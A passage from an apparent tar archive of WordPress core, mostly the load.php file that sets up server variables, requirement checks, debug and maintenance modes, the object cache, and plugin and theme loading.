if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
load.php 0000666 00000156276 15224151220 0006213 0 ustar 00 <?php
/**
* These functions are needed to load WordPress.
*
* @package WordPress
*/
/**
* Returns the HTTP protocol sent by the server.
*
* @since 4.4.0
*
* @return string The HTTP protocol. Default: HTTP/1.0.
*/
function wp_get_server_protocol() {
$protocol = isset( $_SERVER['SERVER_PROTOCOL'] ) ? $_SERVER['SERVER_PROTOCOL'] : '';
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
$protocol = 'HTTP/1.0';
}
return $protocol;
}
/**
* Fixes `$_SERVER` variables for various setups.
*
* @since 3.0.0
* @access private
*
* @global string $PHP_SELF The filename of the currently executing script,
* relative to the document root.
*/
function wp_fix_server_vars() {
global $PHP_SELF;
$default_server_values = array(
'SERVER_SOFTWARE' => '',
'REQUEST_URI' => '',
);
$_SERVER = array_merge( $default_server_values, $_SERVER );
// Fix for IIS when running with PHP ISAPI.
if ( empty( $_SERVER['REQUEST_URI'] )
|| ( 'cgi-fcgi' !== PHP_SAPI && preg_match( '/^Microsoft-IIS\//', $_SERVER['SERVER_SOFTWARE'] ) )
) {
if ( isset( $_SERVER['HTTP_X_ORIGINAL_URL'] ) ) {
// IIS Mod-Rewrite.
$_SERVER['REQUEST_URI'] = $_SERVER['HTTP_X_ORIGINAL_URL'];
} elseif ( isset( $_SERVER['HTTP_X_REWRITE_URL'] ) ) {
// IIS Isapi_Rewrite.
$_SERVER['REQUEST_URI'] = $_SERVER['HTTP_X_REWRITE_URL'];
} else {
// Use ORIG_PATH_INFO if there is no PATH_INFO.
if ( ! isset( $_SERVER['PATH_INFO'] ) && isset( $_SERVER['ORIG_PATH_INFO'] ) ) {
$_SERVER['PATH_INFO'] = $_SERVER['ORIG_PATH_INFO'];
}
// Some IIS + PHP configurations put the script-name in the path-info (no need to append it twice).
if ( isset( $_SERVER['PATH_INFO'] ) ) {
if ( $_SERVER['PATH_INFO'] === $_SERVER['SCRIPT_NAME'] ) {
$_SERVER['REQUEST_URI'] = $_SERVER['PATH_INFO'];
} else {
$_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'] . $_SERVER['PATH_INFO'];
}
}
// Append the query string if it exists and isn't null.
if ( ! empty( $_SERVER['QUERY_STRING'] ) ) {
$_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}
}
// Fix for PHP as CGI hosts that set SCRIPT_FILENAME to something ending in php.cgi for all requests.
if ( isset( $_SERVER['SCRIPT_FILENAME'] ) && str_ends_with( $_SERVER['SCRIPT_FILENAME'], 'php.cgi' ) ) {
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}
// Fix for Dreamhost and other PHP as CGI hosts.
if ( isset( $_SERVER['SCRIPT_NAME'] ) && str_contains( $_SERVER['SCRIPT_NAME'], 'php.cgi' ) ) {
unset( $_SERVER['PATH_INFO'] );
}
// Fix empty PHP_SELF.
$PHP_SELF = $_SERVER['PHP_SELF'];
if ( empty( $PHP_SELF ) ) {
$_SERVER['PHP_SELF'] = preg_replace( '/(\?.*)?$/', '', $_SERVER['REQUEST_URI'] );
$PHP_SELF = $_SERVER['PHP_SELF'];
}
wp_populate_basic_auth_from_authorization_header();
}
/**
* Populates the Basic Auth server details from the Authorization header.
*
* Some servers running in CGI or FastCGI mode don't pass the Authorization
* header on to WordPress. If it's been rewritten to the `HTTP_AUTHORIZATION` header,
* fill in the proper $_SERVER variables instead.
*
* @since 5.6.0
*/
function wp_populate_basic_auth_from_authorization_header() {
// If we don't have anything to pull from, return early.
if ( ! isset( $_SERVER['HTTP_AUTHORIZATION'] ) && ! isset( $_SERVER['REDIRECT_HTTP_AUTHORIZATION'] ) ) {
return;
}
// If either PHP_AUTH key is already set, do nothing.
if ( isset( $_SERVER['PHP_AUTH_USER'] ) || isset( $_SERVER['PHP_AUTH_PW'] ) ) {
return;
}
// From our prior conditional, one of these must be set.
$header = isset( $_SERVER['HTTP_AUTHORIZATION'] ) ? $_SERVER['HTTP_AUTHORIZATION'] : $_SERVER['REDIRECT_HTTP_AUTHORIZATION'];
// Test to make sure the pattern matches expected.
if ( ! preg_match( '%^Basic [a-z\d/+]*={0,2}$%i', $header ) ) {
return;
}
// Removing `Basic ` the token would start six characters in.
$token = substr( $header, 6 );
$userpass = base64_decode( $token );
// There must be at least one colon in the string.
if ( ! str_contains( $userpass, ':' ) ) {
return;
}
list( $user, $pass ) = explode( ':', $userpass, 2 );
// Now shove them in the proper keys where we're expecting later on.
$_SERVER['PHP_AUTH_USER'] = $user;
$_SERVER['PHP_AUTH_PW'] = $pass;
}
/**
* Checks the server requirements.
*
* - PHP version
* - PHP extensions
* - MySQL or MariaDB version (unless a database drop-in is present)
*
* Dies if requirements are not met.
*
* @since 3.0.0
* @access private
*
* @global string $required_php_version The minimum required PHP version string.
* @global string[] $required_php_extensions The names of required PHP extensions.
* @global string $wp_version The WordPress version string.
*/
function wp_check_php_mysql_versions() {
global $required_php_version, $required_php_extensions, $wp_version;
$php_version = PHP_VERSION;
if ( version_compare( $required_php_version, $php_version, '>' ) ) {
$protocol = wp_get_server_protocol();
header( sprintf( '%s 500 Internal Server Error', $protocol ), true, 500 );
header( 'Content-Type: text/html; charset=utf-8' );
printf(
'Your server is running PHP version %1$s but WordPress %2$s requires at least %3$s.',
$php_version,
$wp_version,
$required_php_version
);
exit( 1 );
}
$missing_extensions = array();
if ( isset( $required_php_extensions ) && is_array( $required_php_extensions ) ) {
foreach ( $required_php_extensions as $extension ) {
if ( extension_loaded( $extension ) ) {
continue;
}
$missing_extensions[] = sprintf(
'WordPress %1$s requires the <code>%2$s</code> PHP extension.',
$wp_version,
$extension
);
}
}
if ( count( $missing_extensions ) > 0 ) {
$protocol = wp_get_server_protocol();
header( sprintf( '%s 500 Internal Server Error', $protocol ), true, 500 );
header( 'Content-Type: text/html; charset=utf-8' );
echo implode( '<br>', $missing_extensions );
exit( 1 );
}
// This runs before default constants are defined, so we can't assume WP_CONTENT_DIR is set yet.
$wp_content_dir = defined( 'WP_CONTENT_DIR' ) ? WP_CONTENT_DIR : ABSPATH . 'wp-content';
if ( ! function_exists( 'mysqli_connect' )
&& ! file_exists( $wp_content_dir . '/db.php' )
) {
require_once ABSPATH . WPINC . '/functions.php';
wp_load_translations_early();
$message = '<p>' . __( 'Your PHP installation appears to be missing the MySQL extension which is required by WordPress.' ) . "</p>\n";
$message .= '<p>' . sprintf(
/* translators: %s: mysqli. */
__( 'Please check that the %s PHP extension is installed and enabled.' ),
'<code>mysqli</code>'
) . "</p>\n";
$message .= '<p>' . sprintf(
/* translators: %s: Support forums URL. */
__( 'If you are unsure what these terms mean you should probably contact your host. If you still need help you can always visit the <a href="%s">WordPress support forums</a>.' ),
__( 'https://wordpress.org/support/forums/' )
) . "</p>\n";
$args = array(
'exit' => false,
'code' => 'mysql_not_found',
);
wp_die(
$message,
__( 'Requirements Not Met' ),
$args
);
exit( 1 );
}
}
/**
* Retrieves the current environment type.
*
* The type can be set via the `WP_ENVIRONMENT_TYPE` global system variable,
* or a constant of the same name.
*
* Possible values are 'local', 'development', 'staging', and 'production'.
* If not set, the type defaults to 'production'.
*
* @since 5.5.0
* @since 5.5.1 Added the 'local' type.
* @since 5.5.1 Removed the ability to alter the list of types.
*
* @return string The current environment type.
*/
function wp_get_environment_type() {
static $current_env = '';
if ( ! defined( 'WP_RUN_CORE_TESTS' ) && $current_env ) {
return $current_env;
}
$wp_environments = array(
'local',
'development',
'staging',
'production',
);
// Add a note about the deprecated WP_ENVIRONMENT_TYPES constant.
if ( defined( 'WP_ENVIRONMENT_TYPES' ) && function_exists( '_deprecated_argument' ) ) {
if ( function_exists( '__' ) ) {
/* translators: %s: WP_ENVIRONMENT_TYPES */
$message = sprintf( __( 'The %s constant is no longer supported.' ), 'WP_ENVIRONMENT_TYPES' );
} else {
$message = sprintf( 'The %s constant is no longer supported.', 'WP_ENVIRONMENT_TYPES' );
}
_deprecated_argument(
'define()',
'5.5.1',
$message
);
}
// Check if the environment variable has been set, if `getenv` is available on the system.
if ( function_exists( 'getenv' ) ) {
$has_env = getenv( 'WP_ENVIRONMENT_TYPE' );
if ( false !== $has_env ) {
$current_env = $has_env;
}
}
// Fetch the environment from a constant, this overrides the global system variable.
if ( defined( 'WP_ENVIRONMENT_TYPE' ) && WP_ENVIRONMENT_TYPE ) {
$current_env = WP_ENVIRONMENT_TYPE;
}
// Make sure the environment is an allowed one, and not accidentally set to an invalid value.
if ( ! in_array( $current_env, $wp_environments, true ) ) {
$current_env = 'production';
}
return $current_env;
}
/**
* Retrieves the current development mode.
*
* The development mode affects how certain parts of the WordPress application behave,
* which is relevant when developing for WordPress.
*
* Development mode can be set via the `WP_DEVELOPMENT_MODE` constant in `wp-config.php`.
* Possible values are 'core', 'plugin', 'theme', 'all', or an empty string to disable
* development mode. 'all' is a special value to signify that all three development modes
* ('core', 'plugin', and 'theme') are enabled.
*
* Development mode is considered separately from `WP_DEBUG` and wp_get_environment_type().
* It does not affect debugging output, but rather functional nuances in WordPress.
*
* This function retrieves the currently set development mode value. To check whether
* a specific development mode is enabled, use wp_is_development_mode().
*
* @since 6.3.0
*
* @return string The current development mode.
*/
function wp_get_development_mode() {
static $current_mode = null;
if ( ! defined( 'WP_RUN_CORE_TESTS' ) && null !== $current_mode ) {
return $current_mode;
}
$development_mode = WP_DEVELOPMENT_MODE;
// Exclusively for core tests, rely on the `$_wp_tests_development_mode` global.
if ( defined( 'WP_RUN_CORE_TESTS' ) && isset( $GLOBALS['_wp_tests_development_mode'] ) ) {
$development_mode = $GLOBALS['_wp_tests_development_mode'];
}
$valid_modes = array(
'core',
'plugin',
'theme',
'all',
'',
);
if ( ! in_array( $development_mode, $valid_modes, true ) ) {
$development_mode = '';
}
$current_mode = $development_mode;
return $current_mode;
}
/**
* Checks whether the site is in the given development mode.
*
* @since 6.3.0
*
* @param string $mode Development mode to check for. Either 'core', 'plugin', 'theme', or 'all'.
* @return bool True if the given mode is covered by the current development mode, false otherwise.
*/
function wp_is_development_mode( $mode ) {
$current_mode = wp_get_development_mode();
if ( empty( $current_mode ) ) {
return false;
}
// Return true if the current mode encompasses all modes.
if ( 'all' === $current_mode ) {
return true;
}
// Return true if the current mode is the given mode.
return $mode === $current_mode;
}
/**
* Ensures all of WordPress is not loaded when handling a favicon.ico request.
*
* Instead, send the headers for a zero-length favicon and bail.
*
* @since 3.0.0
* @deprecated 5.4.0 Deprecated in favor of do_favicon().
*/
function wp_favicon_request() {
if ( '/favicon.ico' === $_SERVER['REQUEST_URI'] ) {
header( 'Content-Type: image/vnd.microsoft.icon' );
exit;
}
}
/**
* Dies with a maintenance message when conditions are met.
*
* The default message can be replaced by using a drop-in (maintenance.php in
* the wp-content directory).
*
* @since 3.0.0
* @access private
*/
function wp_maintenance() {
// Return if maintenance mode is disabled.
if ( ! wp_is_maintenance_mode() ) {
return;
}
if ( file_exists( WP_CONTENT_DIR . '/maintenance.php' ) ) {
require_once WP_CONTENT_DIR . '/maintenance.php';
die();
}
require_once ABSPATH . WPINC . '/functions.php';
wp_load_translations_early();
header( 'Retry-After: 600' );
wp_die(
__( 'Briefly unavailable for scheduled maintenance. Check back in a minute.' ),
__( 'Maintenance' ),
503
);
}
/**
* Checks if maintenance mode is enabled.
*
* Checks for a file in the WordPress root directory named ".maintenance".
* This file will contain the variable $upgrading, set to the time the file
* was created. If the file was created less than 10 minutes ago, WordPress
* is in maintenance mode.
*
* @since 5.5.0
*
* @global int $upgrading The Unix timestamp marking when upgrading WordPress began.
*
* @return bool True if maintenance mode is enabled, false otherwise.
*/
function wp_is_maintenance_mode() {
global $upgrading;
if ( ! file_exists( ABSPATH . '.maintenance' ) || wp_installing() ) {
return false;
}
require ABSPATH . '.maintenance';
// If the $upgrading timestamp is older than 10 minutes, consider maintenance over.
if ( ( time() - $upgrading ) >= 10 * MINUTE_IN_SECONDS ) {
return false;
}
// Don't enable maintenance mode while scraping for fatal errors.
if ( is_int( $upgrading ) && isset( $_REQUEST['wp_scrape_key'], $_REQUEST['wp_scrape_nonce'] ) ) {
$key = stripslashes( $_REQUEST['wp_scrape_key'] );
$nonce = stripslashes( $_REQUEST['wp_scrape_nonce'] );
if ( md5( $upgrading ) === $key && (int) $nonce === $upgrading ) {
return false;
}
}
/**
* Filters whether to enable maintenance mode.
*
* This filter runs before it can be used by plugins. It is designed for
* non-web runtimes. If this filter returns true, maintenance mode will be
* active and the request will end. If false, the request will be allowed to
* continue processing even if maintenance mode should be active.
*
* @since 4.6.0
*
* @param bool $enable_checks Whether to enable maintenance mode. Default true.
* @param int $upgrading The timestamp set in the .maintenance file.
*/
if ( ! apply_filters( 'enable_maintenance_mode', true, $upgrading ) ) {
return false;
}
return true;
}
/**
* Gets the time elapsed so far during this PHP script.
*
* @since 5.8.0
*
* @return float Seconds since the PHP script started.
*/
function timer_float() {
return microtime( true ) - $_SERVER['REQUEST_TIME_FLOAT'];
}
/**
* Starts the WordPress micro-timer.
*
* @since 0.71
* @access private
*
* @see timer_stop()
*
* @global float $timestart Unix timestamp set at the beginning of the page load.
*
* @return bool Always returns true.
*/
function timer_start() {
global $timestart;
$timestart = microtime( true );
return true;
}
/**
* Retrieves or displays the time from the page start to when function is called.
*
* @since 0.71
*
* @global float $timestart Seconds from when timer_start() is called.
* @global float $timeend Seconds from when function is called.
*
* @param int|bool $display Whether to echo or return the results. Accepts 0|false for return,
* 1|true for echo. Default 0|false.
* @param int $precision The number of digits from the right of the decimal to display.
* Default 3.
* @return string The "second.microsecond" finished time calculation. The number is formatted
* for human consumption, both localized and rounded.
*/
function timer_stop( $display = 0, $precision = 3 ) {
global $timestart, $timeend;
$timeend = microtime( true );
$timetotal = $timeend - $timestart;
if ( function_exists( 'number_format_i18n' ) ) {
$r = number_format_i18n( $timetotal, $precision );
} else {
$r = number_format( $timetotal, $precision );
}
if ( $display ) {
echo $r;
}
return $r;
}
/**
* Sets PHP error reporting based on WordPress debug settings.
*
* Uses three constants: `WP_DEBUG`, `WP_DEBUG_DISPLAY`, and `WP_DEBUG_LOG`.
* All three can be defined in wp-config.php. By default, `WP_DEBUG` and
* `WP_DEBUG_LOG` are set to false, and `WP_DEBUG_DISPLAY` is set to true.
*
* When `WP_DEBUG` is true, all PHP notices are reported. WordPress will also
* display internal notices: when a deprecated WordPress function, function
* argument, or file is used. Deprecated code may be removed from a later
* version.
*
* It is strongly recommended that plugin and theme developers use `WP_DEBUG`
* in their development environments.
*
* `WP_DEBUG_DISPLAY` and `WP_DEBUG_LOG` perform no function unless `WP_DEBUG`
* is true.
*
* When `WP_DEBUG_DISPLAY` is true, WordPress will force errors to be displayed.
* `WP_DEBUG_DISPLAY` defaults to true. Defining it as null prevents WordPress
* from changing the global configuration setting. Defining `WP_DEBUG_DISPLAY`
* as false will force errors to be hidden.
*
* When `WP_DEBUG_LOG` is true, errors will be logged to `wp-content/debug.log`.
* When `WP_DEBUG_LOG` is a valid path, errors will be logged to the specified file.
*
* Errors are never displayed for XML-RPC, REST, `ms-files.php`, and Ajax requests.
*
* @since 3.0.0
* @since 5.1.0 `WP_DEBUG_LOG` can be a file path.
* @access private
*/
function wp_debug_mode() {
/**
* Filters whether to allow the debug mode check to occur.
*
* This filter runs before it can be used by plugins. It is designed for
* non-web runtimes. Returning false causes the `WP_DEBUG` and related
* constants to not be checked and the default PHP values for errors
* will be used unless you take care to update them yourself.
*
* To use this filter you must define a `$wp_filter` global before
* WordPress loads, usually in `wp-config.php`.
*
* Example:
*
* $GLOBALS['wp_filter'] = array(
* 'enable_wp_debug_mode_checks' => array(
* 10 => array(
* array(
* 'accepted_args' => 0,
* 'function' => function() {
* return false;
* },
* ),
* ),
* ),
* );
*
* @since 4.6.0
*
* @param bool $enable_debug_mode Whether to enable debug mode checks to occur. Default true.
*/
if ( ! apply_filters( 'enable_wp_debug_mode_checks', true ) ) {
return;
}
if ( WP_DEBUG ) {
error_reporting( E_ALL );
if ( WP_DEBUG_DISPLAY ) {
ini_set( 'display_errors', 1 );
} elseif ( null !== WP_DEBUG_DISPLAY ) {
ini_set( 'display_errors', 0 );
}
if ( in_array( strtolower( (string) WP_DEBUG_LOG ), array( 'true', '1' ), true ) ) {
$log_path = WP_CONTENT_DIR . '/debug.log';
} elseif ( is_string( WP_DEBUG_LOG ) ) {
$log_path = WP_DEBUG_LOG;
} else {
$log_path = false;
}
if ( $log_path ) {
ini_set( 'log_errors', 1 );
ini_set( 'error_log', $log_path );
}
} else {
error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );
}
/*
* The 'REST_REQUEST' check here is optimistic as the constant is most
* likely not set at this point even if it is in fact a REST request.
*/
if ( defined( 'XMLRPC_REQUEST' ) || defined( 'REST_REQUEST' ) || defined( 'MS_FILES_REQUEST' )
|| ( defined( 'WP_INSTALLING' ) && WP_INSTALLING )
|| wp_doing_ajax() || wp_is_json_request()
) {
ini_set( 'display_errors', 0 );
}
}
/**
* Sets the location of the language directory.
*
* To set directory manually, define the `WP_LANG_DIR` constant
* in wp-config.php.
*
* If the language directory exists within `WP_CONTENT_DIR`, it
* is used. Otherwise the language directory is assumed to live
* in `WPINC`.
*
* @since 3.0.0
* @access private
*/
function wp_set_lang_dir() {
if ( ! defined( 'WP_LANG_DIR' ) ) {
if ( file_exists( WP_CONTENT_DIR . '/languages' ) && @is_dir( WP_CONTENT_DIR . '/languages' )
|| ! @is_dir( ABSPATH . WPINC . '/languages' )
) {
/**
* Server path of the language directory.
*
* No leading slash, no trailing slash, full path, not relative to ABSPATH
*
* @since 2.1.0
*/
define( 'WP_LANG_DIR', WP_CONTENT_DIR . '/languages' );
if ( ! defined( 'LANGDIR' ) ) {
// Old static relative path maintained for limited backward compatibility - won't work in some cases.
define( 'LANGDIR', 'wp-content/languages' );
}
} else {
/**
* Server path of the language directory.
*
* No leading slash, no trailing slash, full path, not relative to `ABSPATH`.
*
* @since 2.1.0
*/
define( 'WP_LANG_DIR', ABSPATH . WPINC . '/languages' );
if ( ! defined( 'LANGDIR' ) ) {
// Old relative path maintained for backward compatibility.
define( 'LANGDIR', WPINC . '/languages' );
}
}
}
}
/**
* Loads the database class file and instantiates the `$wpdb` global.
*
* @since 2.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
function require_wp_db() {
global $wpdb;
require_once ABSPATH . WPINC . '/class-wpdb.php';
if ( file_exists( WP_CONTENT_DIR . '/db.php' ) ) {
require_once WP_CONTENT_DIR . '/db.php';
}
if ( isset( $wpdb ) ) {
return;
}
$dbuser = defined( 'DB_USER' ) ? DB_USER : '';
$dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
$dbname = defined( 'DB_NAME' ) ? DB_NAME : '';
$dbhost = defined( 'DB_HOST' ) ? DB_HOST : '';
$wpdb = new wpdb( $dbuser, $dbpassword, $dbname, $dbhost );
}
/**
* Sets the database table prefix and the format specifiers for database
* table columns.
*
* Columns not listed here default to `%s`.
*
* @since 3.0.0
* @access private
*
* @global wpdb $wpdb WordPress database abstraction object.
* @global string $table_prefix The database table prefix.
*/
function wp_set_wpdb_vars() {
global $wpdb, $table_prefix;
if ( ! empty( $wpdb->error ) ) {
dead_db();
}
$wpdb->field_types = array(
'post_author' => '%d',
'post_parent' => '%d',
'menu_order' => '%d',
'term_id' => '%d',
'term_group' => '%d',
'term_taxonomy_id' => '%d',
'parent' => '%d',
'count' => '%d',
'object_id' => '%d',
'term_order' => '%d',
'ID' => '%d',
'comment_ID' => '%d',
'comment_post_ID' => '%d',
'comment_parent' => '%d',
'user_id' => '%d',
'link_id' => '%d',
'link_owner' => '%d',
'link_rating' => '%d',
'option_id' => '%d',
'blog_id' => '%d',
'meta_id' => '%d',
'post_id' => '%d',
'user_status' => '%d',
'umeta_id' => '%d',
'comment_karma' => '%d',
'comment_count' => '%d',
// Multisite:
'active' => '%d',
'cat_id' => '%d',
'deleted' => '%d',
'lang_id' => '%d',
'mature' => '%d',
'public' => '%d',
'site_id' => '%d',
'spam' => '%d',
);
$prefix = $wpdb->set_prefix( $table_prefix );
if ( is_wp_error( $prefix ) ) {
wp_load_translations_early();
wp_die(
sprintf(
/* translators: 1: $table_prefix, 2: wp-config.php */
__( '<strong>Error:</strong> %1$s in %2$s can only contain numbers, letters, and underscores.' ),
'<code>$table_prefix</code>',
'<code>wp-config.php</code>'
)
);
}
}
/**
* Toggles `$_wp_using_ext_object_cache` on and off without directly
* touching global.
*
* @since 3.7.0
*
* @global bool $_wp_using_ext_object_cache
*
* @param bool $using Whether external object cache is being used.
* @return bool The current 'using' setting.
*/
function wp_using_ext_object_cache( $using = null ) {
global $_wp_using_ext_object_cache;
$current_using = $_wp_using_ext_object_cache;
if ( null !== $using ) {
$_wp_using_ext_object_cache = $using;
}
return $current_using;
}
/**
* Starts the WordPress object cache.
*
* If an object-cache.php file exists in the wp-content directory,
* it uses that drop-in as an external object cache.
*
* @since 3.0.0
* @access private
*
* @global array $wp_filter Stores all of the filters.
*/
function wp_start_object_cache() {
global $wp_filter;
static $first_init = true;
// Only perform the following checks once.
/**
* Filters whether to enable loading of the object-cache.php drop-in.
*
* This filter runs before it can be used by plugins. It is designed for non-web
* runtimes. If false is returned, object-cache.php will never be loaded.
*
* @since 5.8.0
*
* @param bool $enable_object_cache Whether to enable loading object-cache.php (if present).
* Default true.
*/
if ( $first_init && apply_filters( 'enable_loading_object_cache_dropin', true ) ) {
if ( ! function_exists( 'wp_cache_init' ) ) {
/*
* This is the normal situation. First-run of this function. No
* caching backend has been loaded.
*
* We try to load a custom caching backend, and then, if it
* results in a wp_cache_init() function existing, we note
* that an external object cache is being used.
*/
if ( file_exists( WP_CONTENT_DIR . '/object-cache.php' ) ) {
require_once WP_CONTENT_DIR . '/object-cache.php';
if ( function_exists( 'wp_cache_init' ) ) {
wp_using_ext_object_cache( true );
}
// Re-initialize any hooks added manually by object-cache.php.
if ( $wp_filter ) {
$wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );
}
}
} elseif ( ! wp_using_ext_object_cache() && file_exists( WP_CONTENT_DIR . '/object-cache.php' ) ) {
/*
* Sometimes advanced-cache.php can load object-cache.php before
* this function is run. This breaks the function_exists() check
* above and can result in wp_using_ext_object_cache() returning
* false when actually an external cache is in use.
*/
wp_using_ext_object_cache( true );
}
}
if ( ! wp_using_ext_object_cache() ) {
require_once ABSPATH . WPINC . '/cache.php';
}
require_once ABSPATH . WPINC . '/cache-compat.php';
/*
* If cache supports reset, reset instead of init if already
* initialized. Reset signals to the cache that global IDs
* have changed and it may need to update keys and cleanup caches.
*/
if ( ! $first_init && function_exists( 'wp_cache_switch_to_blog' ) ) {
wp_cache_switch_to_blog( get_current_blog_id() );
} elseif ( function_exists( 'wp_cache_init' ) ) {
wp_cache_init();
}
if ( function_exists( 'wp_cache_add_global_groups' ) ) {
wp_cache_add_global_groups(
array(
'blog-details',
'blog-id-cache',
'blog-lookup',
'blog_meta',
'global-posts',
'image_editor',
'networks',
'network-queries',
'sites',
'site-details',
'site-options',
'site-queries',
'site-transient',
'theme_files',
'translation_files',
'rss',
'users',
'user-queries',
'user_meta',
'useremail',
'userlogins',
'userslugs',
)
);
wp_cache_add_non_persistent_groups( array( 'counts', 'plugins', 'theme_json' ) );
}
$first_init = false;
}
/**
* Redirects to the installer if WordPress is not installed.
*
* Dies with an error message when Multisite is enabled.
*
* @since 3.0.0
* @access private
*/
function wp_not_installed() {
if ( is_blog_installed() || wp_installing() ) {
return;
}
nocache_headers();
if ( is_multisite() ) {
wp_die( __( 'The site you have requested is not installed properly. Please contact the system administrator.' ) );
}
require ABSPATH . WPINC . '/kses.php';
require ABSPATH . WPINC . '/pluggable.php';
$link = wp_guess_url() . '/wp-admin/install.php';
wp_redirect( $link );
die();
}
/**
* Retrieves an array of must-use plugin files.
*
* The default directory is wp-content/mu-plugins. To change the default
* directory manually, define `WPMU_PLUGIN_DIR` and `WPMU_PLUGIN_URL`
* in wp-config.php.
*
* @since 3.0.0
* @access private
*
* @return string[] Array of absolute paths of files to include.
*/
function wp_get_mu_plugins() {
$mu_plugins = array();
if ( ! is_dir( WPMU_PLUGIN_DIR ) ) {
return $mu_plugins;
}
$dh = opendir( WPMU_PLUGIN_DIR );
if ( ! $dh ) {
return $mu_plugins;
}
while ( ( $plugin = readdir( $dh ) ) !== false ) {
if ( str_ends_with( $plugin, '.php' ) ) {
$mu_plugins[] = WPMU_PLUGIN_DIR . '/' . $plugin;
}
}
closedir( $dh );
sort( $mu_plugins );
return $mu_plugins;
}
/**
* Retrieves an array of active and valid plugin files.
*
* While upgrading or installing WordPress, no plugins are returned.
*
* The default directory is `wp-content/plugins`. To change the default
* directory manually, define `WP_PLUGIN_DIR` and `WP_PLUGIN_URL`
* in `wp-config.php`.
*
* @since 3.0.0
* @access private
*
* @return string[] Array of paths to plugin files relative to the plugins directory.
*/
function wp_get_active_and_valid_plugins() {
$plugins = array();
$active_plugins = (array) get_option( 'active_plugins', array() );
// Check for hacks file if the option is enabled.
if ( get_option( 'hack_file' ) && file_exists( ABSPATH . 'my-hacks.php' ) ) {
_deprecated_file( 'my-hacks.php', '1.5.0' );
array_unshift( $plugins, ABSPATH . 'my-hacks.php' );
}
if ( empty( $active_plugins ) || wp_installing() ) {
return $plugins;
}
$network_plugins = is_multisite() ? wp_get_active_network_plugins() : false;
foreach ( $active_plugins as $plugin ) {
if ( ! validate_file( $plugin ) // $plugin must validate as file.
&& str_ends_with( $plugin, '.php' ) // $plugin must end with '.php'.
&& file_exists( WP_PLUGIN_DIR . '/' . $plugin ) // $plugin must exist.
// Not already included as a network plugin.
&& ( ! $network_plugins || ! in_array( WP_PLUGIN_DIR . '/' . $plugin, $network_plugins, true ) )
) {
$plugins[] = WP_PLUGIN_DIR . '/' . $plugin;
}
}
/*
* Remove plugins from the list of active plugins when we're on an endpoint
* that should be protected against WSODs and the plugin is paused.
*/
if ( wp_is_recovery_mode() ) {
$plugins = wp_skip_paused_plugins( $plugins );
}
return $plugins;
}
/**
* Filters a given list of plugins, removing any paused plugins from it.
*
* @since 5.2.0
*
* @global WP_Paused_Extensions_Storage $_paused_plugins
*
* @param string[] $plugins Array of absolute plugin main file paths.
* @return string[] Filtered array of plugins, without any paused plugins.
*/
function wp_skip_paused_plugins( array $plugins ) {
$paused_plugins = wp_paused_plugins()->get_all();
if ( empty( $paused_plugins ) ) {
return $plugins;
}
foreach ( $plugins as $index => $plugin ) {
list( $plugin ) = explode( '/', plugin_basename( $plugin ) );
if ( array_key_exists( $plugin, $paused_plugins ) ) {
unset( $plugins[ $index ] );
// Store list of paused plugins for displaying an admin notice.
$GLOBALS['_paused_plugins'][ $plugin ] = $paused_plugins[ $plugin ];
}
}
return $plugins;
}
/**
* Retrieves an array of active and valid themes.
*
* While upgrading or installing WordPress, no themes are returned.
*
* @since 5.1.0
* @access private
*
* @global string $pagenow The filename of the current screen.
* @global string $wp_stylesheet_path Path to current theme's stylesheet directory.
* @global string $wp_template_path Path to current theme's template directory.
*
* @return string[] Array of absolute paths to theme directories.
*/
function wp_get_active_and_valid_themes() {
global $pagenow, $wp_stylesheet_path, $wp_template_path;
$themes = array();
if ( wp_installing() && 'wp-activate.php' !== $pagenow ) {
return $themes;
}
if ( is_child_theme() ) {
$themes[] = $wp_stylesheet_path;
}
$themes[] = $wp_template_path;
/*
* Remove themes from the list of active themes when we're on an endpoint
* that should be protected against WSODs and the theme is paused.
*/
if ( wp_is_recovery_mode() ) {
$themes = wp_skip_paused_themes( $themes );
// If no active and valid themes exist, skip loading themes.
if ( empty( $themes ) ) {
add_filter( 'wp_using_themes', '__return_false' );
}
}
return $themes;
}
/**
* Filters a given list of themes, removing any paused themes from it.
*
* @since 5.2.0
*
* @global WP_Paused_Extensions_Storage $_paused_themes
*
* @param string[] $themes Array of absolute theme directory paths.
* @return string[] Filtered array of absolute paths to themes, without any paused themes.
*/
function wp_skip_paused_themes( array $themes ) {
$paused_themes = wp_paused_themes()->get_all();
if ( empty( $paused_themes ) ) {
return $themes;
}
foreach ( $themes as $index => $theme ) {
$theme = basename( $theme );
if ( array_key_exists( $theme, $paused_themes ) ) {
unset( $themes[ $index ] );
// Store list of paused themes for displaying an admin notice.
$GLOBALS['_paused_themes'][ $theme ] = $paused_themes[ $theme ];
}
}
return $themes;
}
/**
* Determines whether WordPress is in Recovery Mode.
*
* In this mode, plugins or themes that cause WSODs will be paused.
*
* @since 5.2.0
*
* @return bool
*/
function wp_is_recovery_mode() {
return wp_recovery_mode()->is_active();
}
/**
* Determines whether we are currently on an endpoint that should be protected against WSODs.
*
* @since 5.2.0
*
* @global string $pagenow The filename of the current screen.
*
* @return bool True if the current endpoint should be protected.
*/
function is_protected_endpoint() {
// Protect login pages.
if ( isset( $GLOBALS['pagenow'] ) && 'wp-login.php' === $GLOBALS['pagenow'] ) {
return true;
}
// Protect the admin backend.
if ( is_admin() && ! wp_doing_ajax() ) {
return true;
}
// Protect Ajax actions that could help resolve a fatal error should be available.
if ( is_protected_ajax_action() ) {
return true;
}
/**
* Filters whether the current request is against a protected endpoint.
*
* This filter is only fired when an endpoint is requested which is not already protected by
* WordPress core. As such, it exclusively allows providing further protected endpoints in
